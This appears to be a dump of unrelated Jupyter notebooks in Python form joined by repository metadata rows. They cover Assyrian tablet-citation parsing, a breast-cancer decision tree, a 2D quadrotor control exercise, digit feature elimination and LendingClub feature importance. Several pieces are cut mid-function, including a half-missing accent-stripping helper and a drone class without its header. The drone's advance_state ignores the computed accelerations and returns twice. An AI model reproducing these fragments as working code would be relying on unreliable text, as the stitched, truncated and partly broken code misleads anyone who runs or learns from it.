for name, model in models:
kfold = StratifiedKFold(n_splits=10, random_state=1)
cv_results = cross_val_score(model, X_train, Y_train, cv=kfold, scoring='accuracy')
results.append(cv_results)
names.append(name)
print('%s: %f (%f)' % (name, cv_results.mean(), cv_results.std()))
# -
# ### Comparação dos modelos
pyplot.boxplot(results, labels=names)
pyplot.title('Comparacao dos algoritmos sem balanceamento')
pyplot.show()
# +
model = LogisticRegression(solver='liblinear', multi_class='ovr')
model.fit(X_train, Y_train)
predictions = model.predict(X_validation)
print(accuracy_score(Y_validation, predictions))
print(confusion_matrix(Y_validation, predictions))
print(classification_report(Y_validation, predictions))
# -
# ## Predição
# +
Xnew = [[14.0,15.0,14.7,97,934.7,18,3.3]]
# make a prediction
ynew = model.predict(Xnew)
print("X=%s, Predicted=%s" % (Xnew[0], ynew[0]))
# -
# ## Considerações Finais
#
# O banco de dados sem imputação dos dados ausentes, apesar de ser um dataset pequeno, feito com apenas dados fornecidos e apresentar um desempenho minimamente pior, ainda seria elegível, pois não tivemos ganhos tão significativos a ponto de valer a pena correr o risco de ter um model tendencioso.
| 19,175 |
/City Footnotes.ipynb
|
0cf3994e36dc74742760a012bcec43266a7ac94d
|
[] |
no_license
|
deehrlich/Assyrian-Project
|
https://github.com/deehrlich/Assyrian-Project
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 23,294 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <div class="alert alert-success">
# <b>Author</b>:
#
# Rashik Rahman
# [email protected]
#
# </div>
#
#
# **[Click here to see class lecture](https://drive.google.com/file/d/1-DHsPFHcucGlepA7ph4R0f4RfnzWmA07/view)**
#
# ## No class was conducted!
t = unicodedata.normalize('NFKD', text).encode('ASCII', 'ignore')
return r_text.decode(encoding='UTF-8')
#the city and string need to be changed manually
#Python cannot read underlined words, so you must manually put an '!' infront of the underlined word
city = 'Purušhaddum'
string ='Amkuwa: AKT 6, 104, Buruddum: BIN 6, 34, Dinarnu: CCT 5, 1b, Durhumit: !kt 89/k 430; !kt 91/k 424; !kt 94/k 310; !kt 94/k 340; !kt 94/k 1673; !kt a/k 1056b; AKT 6, 144; AKT 6, 150; !BIN 4, 36; BIN 4, 64; CCT 4, 48a; CCT 5, 13a; kt c/k 212; kt c/k 237; !CTMMA 1, 79; !I 750; !I 790; KTK 14; !kt n/k 227; !kt n/k 483; !kt n/k 805; !kt n/k 1277; TC 2, 23; TC 2, 36; !TC 3, 149; TPAK 1, 161a+b; VS 26, 18; !VS 26 71, Eluhhut: c/k 528, Hahhum: !kt 94/k 403; kt c/k 695; !kt h/k 73; I 430; KUG 13; !kt m/k 75; kt n/k 1509, Haqa: KTS 1, 22b, Hattum: AKT 6, 150; CCT 5, 15b; I 490; KTP 25; LB 1206; RA 58, 150 (MAH 10283), Hurama: !kt 94/k 1673; ATHE 63; BIN 4, 48; TC 1, 9, Kuburnat: kt a/k 403; kt a/k 513; Kunanamit: LB 1206; VS 26, 71, Luhuzattiya: kt 92/k 1036; kt c/k 367; kt m/k 148; kt n/k 283, Mamma: CCT 2, 11a; KTH 1; Tab. Naster (VAT 26.46), Marithum: CCT 5, 13a, Ninašša: !kt 94/k 345; !kt c/k 669; !TC 3, 165, Qaṭṭara: ICK 1, 189; Ka 848; Ka 970, Šalatuwar: !kt 83/k 117; !kt 87/k 465; !kt 91/k 424; !kt 93/k 285; !kt 94/k 153; !kt 94/k 651; !kt 94/k 1323; !AKT 3, 34; AKT 6, 176; BIN 4, 35; !Cole 2; KTP 10; MIXON 18; !kt n/k 1490; !TC 2, 36, māt Šarla: AKT 1, 78, Šašassama: AKT 6, 104, Šinahuttum: kt 94/k 340, Talhat: kt 87/k 463; kt 94/k 690; VS 26, 31 (wr. Tilhat), Tawiniya: ATHE 63, Tegarama: kt 92/k 1036; kt n/k 468; Timelkiya: AKT 6, 144; AKT 6, 176; !BIN 4, 48; kt c/k 337; !kt h/k 73, Tišmurna: kt 94/k 310; AKT 6, 144; AKT 6, 150; !CCT 4, 47a; POAT 16, Titattum: VS 26, 26, Tuhpiya: !kt 91/k 424; kt 94/k 419; !kt n/k 1490; !VS 26, 26, Tum(e)liya: !kt 91/k 345; AKT 6, 141; AKT 6, 144; AKT 6, 175, Ulama: !kt 83/k 117; kt 88/k 507b; !kt 91/k 345; !kt 94/k 340; !kt 94/k 1323; AKT 6, 216; kt c/k 212; !kt c/k 445; kt c/k 669; I 484; I 766; kt k/k 43; !KTS 2, 40; !kt n/k 696; !TC 3, 165, Uršu: ATHE 37, Ušbugattum: !kt 91/k 424, Ušša: BIN 4, 187; I 766, Wahšušana: !kt 83/k 117; !kt 87/k 44; !kt 87/k 465; kt 88/k 507b; !kt 89/k 430; !kt 91/k 345; !kt 91/k 424; !kt 91/k 475; !kt 94/k 310; !kt 94/k 340; kt 94/k 345; kt 94/k 365; kt 94/k 497; kt 94/k 825; kt 94/k 970; !kt 94/k 1670; !kt a/ k 1056b; AKT 1, 78; !AKT 3, 34; AKT 6, 175; ATHE 63; !BIN 4, 36; BIN 4, 43; kt c/k 48; !kt c/k 50; kt c/k 191; kt c/k 212; kt c/k 263; kt c/k 309; kt c/k 337; kt c/k 373; kt c/k 406; !kt c/k 669; kt c/k 735; kt c/k 866; CCT 4, 3a; !CCT 4, 4a; !CCT 4, 22b; CCT 6, 7c; KTH 1; !KTH 14; KTH 33; KTP 4; KTP 10; kt n/k 84; !kt n/k 227; !kt n/k 1456; !kt n/k 1490; !TC 2, 36; !TC 3, 3; TPAK 1, 161a+b; !TTC 28; !VS 26, 31; !VS 26, 84, Wašhaniya: !CCT 5, 15b; TC 3, 146; !TC 3, 165; VS 26, 46, Zalpa: ATHE 48; ATHE 63; BIN 6, 167; CCT 6, 7c; kt c/k 337; kt c/k 367; Ka 434, Zimišhuna: !kt 94/k 310; kt k/k 108'
cities_re = r'[a-zA-Z\’]{4,}:'
string = remove_accents(string)
cities_split = re.split(cities_re, string)
cities= re.findall(cities_re,string)
key=[x.split(';') for x in cities_split]
key = key[1:]
final = []
for i in range(len(key)):
for k in key[i]:
match = re.search(r'!',k)
if match:
k=re.sub(r', $','',k)
k=re.sub(r'!','',k)
final+=[(cities[i],k)]
final
# -
df= pd.DataFrame(final)
df.columns=['City Mentioned', 'Tablet']
df['City'] = city
df = df.set_index('City')
df['City Mentioned'] = df['City Mentioned'].map(lambda x: x.rstrip(':'))
df
pwd
# cd /Users/Deehrlich/Desktop/
df.to_excel(city+'.xlsx')
st:8080/"} id="o2SP9gkgYQF1" outputId="bd929662-0808-4935-c158-208ae9cc7975"
df['diagnosis'].value_counts()
# + colab={"base_uri": "https://localhost:8080/", "height": 438} id="pkaZjF4YYQF1" outputId="4e0824c8-d580-4963-b157-b3388119ae19"
df= df.drop(["id"], axis = 1)
df
# + colab={"base_uri": "https://localhost:8080/", "height": 320} id="AZJIBrDPYQF1" outputId="bb64c503-812c-4a05-b2ba-7c9a2a951655"
df = df.drop(["Unnamed: 32"], axis = 1)
df
# + [markdown] id="OzCc9MUqYQF2"
# # Visualization
# it is import to see that counts of different type of cancer
# + id="vm7xhoKJYQF2"
import matplotlib.pyplot as plt
import seaborn as sns
# + colab={"base_uri": "https://localhost:8080/"} id="i8IlIZseYQF2" outputId="70ae46f7-7179-44fc-895a-0cca191355a0"
benign, malignant=df['diagnosis'].value_counts()
print("No of Benign cell", benign)
print("No of malignant cell", malignant)
# + colab={"base_uri": "https://localhost:8080/", "height": 660} id="n6n-ABO2YQF3" outputId="1aae2b28-5e05-4435-8669-46411ca6f83b"
plt.figure(figsize=(10,10))
sns.countplot(df['diagnosis'])
plt.show()
# + colab={"base_uri": "https://localhost:8080/"} id="CQeu8vL9YQF3" outputId="5914eebd-ba3a-486a-87cc-78b4bea27420"
print("% of Benign cell is ", benign*100/len(df))
print("% of Malignant cell is ", malignant*100/len(df))
# + colab={"base_uri": "https://localhost:8080/", "height": 373} id="x5ARVQ3EYQF3" outputId="fa34a02b-29d1-4b14-c4cf-0f1470334d44"
df.diagnosis.value_counts().plot(kind='pie',shadow=True,colors=('darkgreen','orange'),autopct='%.2f',figsize=(8,6))
plt.title('Diagnosis')
plt.show()
# + [markdown] id="-_w5saLYYQF4"
# Pairplot helps to plot among the most useful feature
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="5Dj1IwPFYQF4" outputId="e3374311-c171-491b-a560-4e0b2f66a8fe"
cols=['diagnosis','radius_mean', 'texture_mean', 'perimeter_mean',
'area_mean','smoothness_mean', 'compactness_mean', 'concavity_mean',
'concave points_mean', 'symmetry_mean', 'fractal_dimension_mean']
plt.figure(figsize=(10,10))
sns.pairplot(data=df[cols],hue='diagnosis', palette='RdBu')
# + [markdown] id="8o9MQTMCYQF5"
# Heatmap:
#
# To find the most correlated features
# + id="UCijXMNjYQF5"
import numpy as np
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="f8aUbQVFYQF5" outputId="32d9b636-03b2-49e7-a90f-f1e7738238dd"
#generate the corelation matrix
corr=df.corr().round(2)
#mask for the upper triangle
mask=np.zeros_like(corr, dtype=np.bool)
mask[np.triu_indices_from(mask)]
# Set figure size
f, ax = plt.subplots(figsize=(20, 20))
#define custom colormap
cmap=sns.diverging_palette(220,10, as_cmap=True)
#draw the heatmap
sns.heatmap(corr, mask=mask, cmap=cmap, vmin=-1, vmax=1, center=0,
square=True, linewidths=.5, cbar_kws={"shrink": .5}, annot=True)
plt.tight_layout()
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="oM1fbHTtYQF6" outputId="80829873-39cc-46f3-d6ff-203998d6bcf2"
# Generate and visualize the correlation matrix
corr = df.corr().round(2)
# Mask for the upper triangle
mask = np.zeros_like(corr, dtype=np.bool)
mask[np.triu_indices_from(mask)] = True
# Set figure size
f, ax = plt.subplots(figsize=(20, 20))
# Define custom colormap
cmap = sns.diverging_palette(220, 10, as_cmap=True)
# Draw the heatmap
sns.heatmap(corr, mask=mask, cmap=cmap, vmin=-1, vmax=1, center=0,
square=True, linewidths=.5, cbar_kws={"shrink": .5}, annot=True)
plt.tight_layout()
# + colab={"base_uri": "https://localhost:8080/", "height": 232} id="7gIE2fguYQF6" outputId="55643c9b-3db0-4f34-c33b-114b70b6d3dc"
M = df[df.diagnosis == "M"]
M.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 232} id="VpYodAmIYQF7" outputId="eb373099-1c00-44f4-a3de-941acc063cd5"
B = df[df.diagnosis == "B"]
B.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 295} id="wv08k4S_YQF7" outputId="49d0de34-dce5-4ccb-a9c5-1c6f82f01bac"
plt.title("Malignant vs Benign Tumor")
plt.xlabel("Radius Mean")
plt.ylabel("Texture Mean")
plt.scatter(M.radius_mean, M.texture_mean, color = "red", label = "Malignant", alpha = 0.3)
plt.scatter(B.radius_mean, B.texture_mean, color = "lime", label = "Benign", alpha = 0.3)
plt.legend()
plt.show()
# + [markdown] id="PMfWLnpkYQF8"
# # Meaning Of Decision Tree Algorithm
# Decision tree models where the target variable uses a discrete set of values are classified as Classification Trees.
#
# In these trees, each node, or leaf, represent class labels while the branches represent conjunctions of features leading to class labels.
#
# A decision tree where the target variable takes a continuous value, usually numbers, are called Regression Trees.
#
# The two types are commonly referred to together at CART (Classification and Regression Tree).
# + [markdown] id="H5QIlZcPYQF8"
# 
# + [markdown] id="32jfy0wgYQF8"
# # Decision Tree with Sklearn
# + id="VuxeIhQLYQF8"
feature_cols = ['radius_mean', 'texture_mean', 'perimeter_mean', 'area_mean','smoothness_mean', 'compactness_mean', 'concavity_mean','concave points_mean', 'symmetry_mean', 'fractal_dimension_mean']
# + id="XXff3fFCYQF9"
x = df[feature_cols]
y = df.diagnosis.values
# + colab={"base_uri": "https://localhost:8080/", "height": 195} id="S-QBFedjYQF9" outputId="95b06841-b9d8-4271-eca4-801c3bd406f8"
x.head()
# + [markdown] id="wk_Y5ERpYQF9"
# # What is normalization?
#
# Normalization is a technique often applied as part of data preparation for machine learning. The goal of normalization is to change the values of numeric columns in the dataset to use a common scale, without distorting differences in the ranges of values or losing information. Normalization is also required for some algorithms to model the data correctly.
# + [markdown] id="yi7KRteQYQF-"
# ## MinMax:
# The min-max normalizer linearly rescales every feature to the [0,1] interval.
#
# Rescaling to the [0,1] interval is done by shifting the values of each feature so that the minimal value is 0, and then dividing by the new maximal value (which is the difference between the original maximal and minimal values).
#
# The values in the column are transformed using the following formula:
#
# normalization using the min-max function
#
# 
# + colab={"base_uri": "https://localhost:8080/", "height": 402} id="EcT_ThQLYQF-" outputId="eaa4c056-47a5-4be3-c828-95d6d4b4b34f"
# Normalization:
x = (x - np.min(x)) / (np.max(x) - np.min(x))
x
# + colab={"base_uri": "https://localhost:8080/"} id="vxifSzkdYQF-" outputId="c6f055c6-9fe0-4579-feb8-4fe0c81af021"
from sklearn.model_selection import train_test_split
#for checking testing results
from sklearn.metrics import classification_report, confusion_matrix
#for visualizing tree
from sklearn.tree import plot_tree
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size = 0.2, random_state = 0)
print("Training split input- ", x_train.shape)
print("Testing split input- ", x_test.shape)
# + id="hc7cvG3nYQF-"
from sklearn.tree import DecisionTreeClassifier
# + id="zXyUc3GzYQF_"
dt = DecisionTreeClassifier()
# + colab={"base_uri": "https://localhost:8080/"} id="qWJd0NCGYQF_" outputId="777d437c-2901-4d8a-857c-9de4a7a1624d"
dt.fit(x_train, y_train)
# + [markdown] id="N1o7LR8vYQF_"
# ### Testing
# + [markdown] id="mIgkL9tiYQF_"
# #### Precision — Also called Positive predictive value
# The ratio of correct positive predictions to the total predicted positives.
# #### Recall — Also called Sensitivity, Probability of Detection, True Positive Rate
#
# The ratio of correct positive predictions to the total positives examples.
#
#
# + [markdown] id="REloluZiYQGA"
# ### Confusion matrix
# confusion matrix usage to evaluate the quality of the output of a classifier. The diagonal elements represent the number of points for which the predicted label is equal to the true label, while off-diagonal elements are those that are mislabeled by the classifier. The higher the diagonal values of the confusion matrix the better, indicating many correct predictions.
# + [markdown] id="5Wlb1VJ5YQGA"
# 
# + [markdown] id="uXOwF6QfYQGA"
# 
# + [markdown] id="HzaXJ3JzYQGA"
# ### Accuracy
# Talking about accuracy, our favourite metric!
#
# Accuracy is defined as the ratio of correctly predicted examples by the total examples.
# + [markdown] id="qUj80XgRYQGB"
# 
#
# 
# + colab={"base_uri": "https://localhost:8080/"} id="o1480BUpYQGB" outputId="5ecfd3e7-34d7-478d-9b68-9915f59d1589"
y_pred = dt.predict(x_test)
print("Classification report - \n", classification_report(y_test,y_pred))
# + colab={"base_uri": "https://localhost:8080/"} id="m4Jw-tlxYQGH" outputId="3e541d3a-cff8-453d-f321-035594d75296"
cm=confusion_matrix(y_test,y_pred)
cm
# + colab={"base_uri": "https://localhost:8080/", "height": 309} id="3d8FYp05YQGI" outputId="85e8bfc6-7649-4bb7-bc57-2df0fa321553"
plt.figure(figsize=(5,5))
sns.heatmap(data=cm,linewidths=1.0, annot=True,square = True, cmap = 'Blues')
plt.ylabel('Actual label')
plt.xlabel('Predicted label')
all_sample_title = 'Accuracy Score: {0}'.format(dt.score(x_test, y_test))
plt.title(all_sample_title, size = 15)
plt.savefig("/content/drive/My Drive/project videos")
# + colab={"base_uri": "https://localhost:8080/"} id="IKgHppxnSY2K" outputId="54b67613-f669-4a7d-ce95-2ac57cb4a238"
# ! pip install graphviz
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="Uw4cUjopYQGJ" outputId="bace8855-5989-44fb-8e2f-08847eb697cf"
# Visualising the graph without the use of graphviz
plt.figure(figsize = (50,50))
dec_tree = plot_tree(decision_tree=dt, feature_names = df.columns, class_names =["Malignant", "Benign"] , filled = True , precision = 4, rounded = True)
plt.savefig("/content/drive/My Drive/project videos")
# + id="JfHkITxaYQGJ"
| 14,206 |
/notebooks/control/lesson_1_vehicle_dynamics/5. Controlling a 2D Quad.ipynb
|
c34ba5599abcf254baa7f414cd7d3a49135526c4
|
[] |
no_license
|
shovan777/FCND-Backyard-Flyer
|
https://github.com/shovan777/FCND-Backyard-Flyer
| 0 | 0 | null | 2018-12-01T18:52:32 | 2018-11-30T14:32:28 | null |
Jupyter Notebook
| false | false |
.py
| 88,049 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %matplotlib inline
#
# # Recursive feature elimination
#
#
# A recursive feature elimination example showing the relevance of pixels in
# a digit classification task.
#
# <div class="alert alert-info"><h4>Note</h4><p>See also `sphx_glr_auto_examples_feature_selection_plot_rfe_with_cross_validation.py`</p></div>
#
#
#
# +
print(__doc__)
from sklearn.svm import SVC
from sklearn.datasets import load_digits
from sklearn.feature_selection import RFE
import matplotlib.pyplot as plt
# -
# Load the digits dataset
digits = load_digits()
X = digits.images.reshape((len(digits.images), -1))
y = digits.target
X.shape
plt.imshow(X[3, :].reshape((8,8)))
# Create the RFE object and rank each pixel
svc = SVC(kernel="linear", C=1)
rfe = RFE(estimator=svc, n_features_to_select=1, step=1)
rfe.fit(X, y)
ranking = rfe.ranking_.reshape(digits.images[0].shape)
rfe.ranking_
# Plot pixel ranking
plt.matshow(ranking, cmap=plt.cm.Blues)
plt.colorbar()
plt.title("Ranking of pixels with RFE")
plt.show()
[i for i in zip(range(64), rfe.ranking_)]
):
self.k_f = k_f
self.I_x = I_x
self.l = l
self.m = m
self.omega_1 = 0.0
self.omega_2 = 0.0
self.g = 9.81
# z, y, phi, z_dot, y_dot, phi_dot
self.X = np.array([0.0,0.0,0.0,0.0,0.0,0.0])
def advance_state_uncontrolled(self,dt):
"""Advances the state of the drone by dt seconds.
Note that this method assumes zero rotational speed
for both propellers."""
X_dot = np.array([
self.X[3],
self.X[4],
self.X[5],
self.g,
0.0,
0.0])
# Change in state will be
self.X = self.X + X_dot * dt
return self.X
def get_thrust_and_moment(self):
"""Helper function which calculates and returns the
collective thrust and the moment about the X axis"""
f1 = self.k_f * self.omega_1 ** 2
f2 = self.k_f * self.omega_2 ** 2
# c is often used to indicate "collective" thrust
c = f1 + f2
M_x = (f1 - f2) * self.l
return c, M_x
@property
def z_dot_dot(self):
"""Calculates vertical (z) acceleration of drone."""
c, M_x = self.get_thrust_and_moment()
phi = self.X[2]
a_z = self.g - c * math.cos(phi) / self.m
return a_z
@property
def y_dot_dot(self):
"""Calculates lateral (y) acceleration of drone."""
c, M_x = self.get_thrust_and_moment()
phi = self.X[2]
a_y = c * math.sin(phi) / self.m
return a_y
@property
def phi_dot_dot(self):
c, M_x = self.get_thrust_and_moment()
angular_acc = M_x / self.I_x
return angular_acc
############################
# BEGIN TODOS ##############
def advance_state(self, dt):
"""
Advances the state of the drone forward by dt seconds.
"""
X_dot = np.array([
self.X[3],
self.X[4],
self.X[5],
self.g,
0.0,
0.0])
# Change in state will be
self.X = self.X + X_dot * dt
return self.X
return self.X
def set_rotors_angular_velocities(self,linear_acc):
"""
Sets self.omega_1 and self.omega_2 to realize the desired
linear_acc. Note that this is for vertical motion ONLY. It
is assumed that rotational acceleration and phi is zero
"""
# TODO
omega = math.sqrt(self.m * (-linear_acc + self.g) /(2 * self.k_f))
self.omega_1 = omega
self.omega_2 = omega
return self.omega_1, self.omega_2
# ### Testing `advance_state` and `set_rotors`
# +
# Start by generating a target trajectory and
# target vertical acceleration
total_time = 3.0
dt = 0.002
t = np.linspace(0.0,total_time,int(total_time/dt))
z_path= 0.5*np.cos(2*t)-0.5
z_dot_dot_path= -2.0*np.cos(2*t)
# +
# Try to follow the trajectory.
# Store the state history as we go.
drone = Drone2D()
drone_state_history = drone.X
for i in range(t.shape[0]-1):
# setting the propeller velocities
drone.set_rotors_angular_velocities(z_dot_dot_path[i])
# calculating the new state vector
drone_state = drone.advance_state(dt)
# generate a history of vertical positions for drone
drone_state_history = np.vstack((drone_state_history, drone_state))
# -
# Compare the planned path to the one that has been executed!
plt.plot(t,z_path,linestyle='-',marker='o',color='red')
plt.plot(t,drone_state_history[:,0],linestyle='-',color='blue')
plt.grid()
plt.title('Change in height').set_fontsize(20)
plt.xlabel('$t$ [sec]').set_fontsize(20)
plt.ylabel('$z-z_0$ [$m$]').set_fontsize(20)
plt.xticks(fontsize = 14)
plt.yticks(fontsize = 14)
plt.legend(['planned path','executed path'],fontsize = 18)
plt.show()
# [Solution](/notebooks/5.%20Controlling%20a%202D%20Quad%20SOLUTION.ipynb)
et of variables included here are the intersection of what's available both when investors download historical data and when investors browse loans for manual investing.
#
# Data dictionary: https://resources.lendingclub.com/LCDataDictionary.xlsx
#
# Target: `charged_off`
#
# **This is a classification problem, so we'll choose a [scoring metric](https://scikit-learn.org/stable/modules/model_evaluation.html#common-cases-predefined-values) for classification: ROC AUC.**
#
# **For our evaluation protocol, we'll choose cross-validation with independent test set.**
# + id="7QpRtdfeQKPM" colab_type="code" colab={}
# %matplotlib inline
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
pd.options.display.max_columns = 500
pd.options.display.max_rows = 500
url = 'https://drive.google.com/uc?export=download&id=1AafT_i1dmfaxqKiyFofVndleKozbQw3l'
df = pd.read_csv(url)
X = df.drop(columns='charged_off')
y = df['charged_off']
X_train, X_test, y_train, y_test = train_test_split(
X, y, train_size=0.80, test_size=0.20, stratify=y, random_state=42)
def wrangle(X):
X = X.copy()
# Drop some columns
X = X.drop(columns='id') # id is random
X = X.drop(columns=['member_id', 'url', 'desc']) # All null
X = X.drop(columns='title') # Duplicative of purpose
X = X.drop(columns='grade') # Duplicative of sub_grade
# Transform sub_grade from "A1" - "G5" to 1.1 - 7.5
def wrangle_sub_grade(x):
first_digit = ord(x[0]) - 64
second_digit = int(x[1])
return first_digit + second_digit/10
X['sub_grade'] = X['sub_grade'].apply(wrangle_sub_grade)
# Convert percentages from strings to floats
X['int_rate'] = X['int_rate'].str.strip('%').astype(float)
X['revol_util'] = X['revol_util'].str.strip('%').astype(float)
# Transform earliest_cr_line to an integer: how many days it's been open
X['earliest_cr_line'] = pd.to_datetime(X['earliest_cr_line'], infer_datetime_format=True)
X['earliest_cr_line'] = pd.Timestamp.today() - X['earliest_cr_line']
X['earliest_cr_line'] = X['earliest_cr_line'].dt.days
# Create features for three employee titles: teacher, manager, owner
X['emp_title'] = X['emp_title'].str.lower()
X['emp_title_teacher'] = X['emp_title'].str.contains('teacher', na=False)
X['emp_title_manager'] = X['emp_title'].str.contains('manager', na=False)
X['emp_title_owner'] = X['emp_title'].str.contains('owner', na=False)
# Drop categoricals with high cardinality
X = X.drop(columns=['emp_title', 'zip_code'])
# Transform features with many nulls to binary flags
many_nulls = ['sec_app_mths_since_last_major_derog',
'sec_app_revol_util',
'sec_app_earliest_cr_line',
'sec_app_mort_acc',
'dti_joint',
'sec_app_collections_12_mths_ex_med',
'sec_app_chargeoff_within_12_mths',
'sec_app_num_rev_accts',
'sec_app_open_act_il',
'sec_app_open_acc',
'revol_bal_joint',
'annual_inc_joint',
'sec_app_inq_last_6mths',
'mths_since_last_record',
'mths_since_recent_bc_dlq',
'mths_since_last_major_derog',
'mths_since_recent_revol_delinq',
'mths_since_last_delinq',
'il_util',
'emp_length',
'mths_since_recent_inq',
'mo_sin_old_il_acct',
'mths_since_rcnt_il',
'num_tl_120dpd_2m',
'bc_util',
'percent_bc_gt_75',
'bc_open_to_buy',
'mths_since_recent_bc']
for col in many_nulls:
X[col] = X[col].isnull()
# For features with few nulls, do mean imputation
for col in X:
if X[col].isnull().sum() > 0:
X[col] = X[col].fillna(X[col].mean())
# Return the wrangled dataframe
return X
# Wrangle train and test in the same way
X_train = wrangle(X_train)
X_test = wrangle(X_test)
# + id="rHRNFTD9QKPr" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 306} outputId="2e86cdcf-593e-401c-f3d3-1d4a6a814802"
import category_encoders as ce
from scipy.stats import randint
from sklearn.model_selection import RandomizedSearchCV
from xgboost import XGBClassifier
encoder = ce.OrdinalEncoder()
X_train = encoder.fit_transform(X_train)
param_distributions = {
'n_estimators': randint(50, 300),
'max_depth': randint(2, 4)
}
# n_iter & cv parameters are low here so the example runs faster
search = RandomizedSearchCV(
estimator=XGBClassifier(n_jobs=-1, random_state=42),
param_distributions=param_distributions,
n_iter=2,
scoring='roc_auc',
n_jobs=-1,
cv=2,
verbose=10,
return_train_score=True,
random_state=42
)
search.fit(X_train.values, y_train.values)
# + id="PDv2VLpaQKQX" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="d818da51-87bd-4f44-850f-20dc0ec389e2"
print('Cross-Validation ROC AUC:', search.best_score_)
# + id="ST3wdVXjQKQf" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="d42d8eba-ea23-4166-dce3-d02eb1e355f1"
from sklearn.metrics import roc_auc_score
best = search.best_estimator_
X_test = encoder.transform(X_test)
y_pred_proba = best.predict_proba(X_test.values)[:,1]
print('Test ROC AUC:', roc_auc_score(y_test, y_pred_proba))
# + [markdown] id="L8J55RHwQKQv" colab_type="text"
# # 1a. Feature Importances
# - Global explanation: all features in relation to each other
# - Default, fastest, good for first estimates
#
# [Here's some food for thought](https://blog.datadive.net/selecting-good-features-part-iii-random-forests/) about feature importances:
#
# >**When the dataset has two (or more) correlated features, then from the point of view of the model, any of these correlated features can be used as the predictor, with no concrete preference of one over the others.** But once one of them is used, the importance of others is significantly reduced since effectively the impurity they can remove is already removed by the first feature. As a consequence, they will have a lower reported importance. This is not an issue when we want to use feature selection to reduce overfitting, since it makes sense to remove features that are mostly duplicated by other features. But when interpreting the data, it can lead to the incorrect conclusion that one of the variables is a strong predictor while the others in the same group are unimportant, while actually they are very close in terms of their relationship with the response variable.
#
# For more information, see [Beware Default Random Forest Importances](https://explained.ai/rf-importance/index.html).
# + id="UTq37bEWQKQx" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 303} outputId="6d9f205a-21ce-48f3-91e0-28889ab2ffbd"
#Use all features
# n = len(X_train.columns)
#Use 20 features
n = 20
figsize = (5,12)
importances = pd.Series(best.feature_importances_, X_train.columns)
top_n = importances.sort_values()[-n:]
top_n.plot.barh(color='gray')
plt.figure(figsize=figsize)
# + [markdown] id="d3q892jXQKQ6" colab_type="text"
# # 1b. Drop-Column Importance
# - Global explanation: all features in relation to each other
# - The best in theory, but much too slow in practice
#
# `sub_grade` is correlated with `int_rate`. If we drop `sub_grade`, the model uses other correlated features more, so the score remains similar.
# + id="HEoa8uupQKQ8" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 68} outputId="d99ecb30-21fd-46d6-b149-7fca1102425f"
from sklearn.model_selection import cross_val_score
X_train_no_subgrade = X_train.drop(columns='sub_grade')
new_model = XGBClassifier(max_depth=2, n_estimators=200, n_jobs=-1, random_state=42)
score_with = cross_val_score(new_model, X_train, y_train, cv=2, scoring='roc_auc').mean()
print('Cross-Validation ROC AUC with sub_grade:', score_with)
score_without = cross_val_score(new_model, X_train_no_subgrade, y_train, cv=2, scoring='roc_auc').mean()
print('Cross-Validation ROC AUC without sub_grade:', score_without)
print('Drop-Column Importance:', score_with - score_without)
# + [markdown] id="ILmBoPqDQKRK" colab_type="text"
# # 1c. Permutation Importance
# - Global explanation: all features in relation to each other
# - A good compromise!
#
# Permutation Importance is a compromise between Feature Importance based on impurity reduction (which is the fastest) and Drop Column Importance (which is the "best.")
#
# [The ELI5 library documentation explains,](https://eli5.readthedocs.io/en/latest/blackbox/permutation_importance.html)
#
# > Importance can be measured by looking at how much the score (accuracy, F1, R^2, etc. - any score we’re interested in) decreases when a feature is not available.
# >
# > To do that one can remove feature from the dataset, re-train the estimator and check the score. But it requires re-training an estimator for each feature, which can be computationally intensive. ...
# >
# >To avoid re-training the estimator we can remove a feature only from the test part of the dataset, and compute score without using this feature. It doesn’t work as-is, because estimators expect feature to be present. So instead of removing a feature we can replace it with random noise - feature column is still there, but it no longer contains useful information. This method works if noise is drawn from the same distribution as original feature values (as otherwise estimator may fail). The simplest way to get such noise is to shuffle values for a feature, i.e. use other examples’ feature values - this is how permutation importance is computed.
# >
# >The method is most suitable for computing feature importances when a number of columns (features) is not huge; it can be resource-intensive otherwise.
# + [markdown] id="nKcar3VSQKRN" colab_type="text"
# ### Do-It-Yourself way, for intuition
# + id="R4uPCCy0QKRP" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 119} outputId="52d6626e-7b3e-4f6b-b1d1-08930ddcdc15"
X_test['sub_grade'].head()
# + id="EZy1h1FJUhyc" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 119} outputId="e3c0c060-543a-4bac-dc8c-726bcc2d3aaf"
X_test_permuted = X_test.copy()
X_test_permuted['sub_grade'] = np.random.permutation(X_test_permuted['sub_grade'])
X_test_permuted['sub_grade'].head()
# + [markdown] id="w7XdHhRBVHx-" colab_type="text"
# **Shuffling the feature destroys the relationship between that feature and the other features/target.**
# + id="5jlJxhASVN2K" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="398089d2-766a-4649-866c-d6d2ef895e20"
score_with = cross_val_score(new_model, X_train, y_train, cv=2, scoring='roc_auc').mean()
print('Cross-Validation ROC AUC with sub_grade:', score_with)
y_pred_proba = best.predict_proba(X_test_permuted.values)[:,1]
print('Test ROC AUC permuted:', roc_auc_score(y_test, y_pred_proba))
# + [markdown] id="95wdUw4BQKRa" colab_type="text"
# ### With eli5 library
#
# For more documentation on using this library, see:
